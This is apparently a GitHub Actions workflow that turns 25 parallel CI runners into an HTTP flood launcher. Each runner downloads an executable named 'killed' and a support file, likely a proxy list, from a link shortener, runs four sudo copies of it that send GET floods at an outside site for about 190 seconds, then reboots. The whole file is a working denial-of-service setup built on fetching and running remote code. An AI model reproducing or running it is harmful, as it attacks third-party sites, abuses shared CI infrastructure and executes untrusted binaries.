name: Ubuntu VDS 45 saniye kiled

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          wget https://curl.by/Llhod/killed
          wget https://curl.by/JK5FX/fres.txt
          chmod +x killed
          PIDS=()
          for i in {1..4}; do
            sudo timeout 200 ./killed GET https://antiddos.ooguy.com/ fres.txt 190 64 10 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 200
        
      - name: OK !
        run: sudo reboot
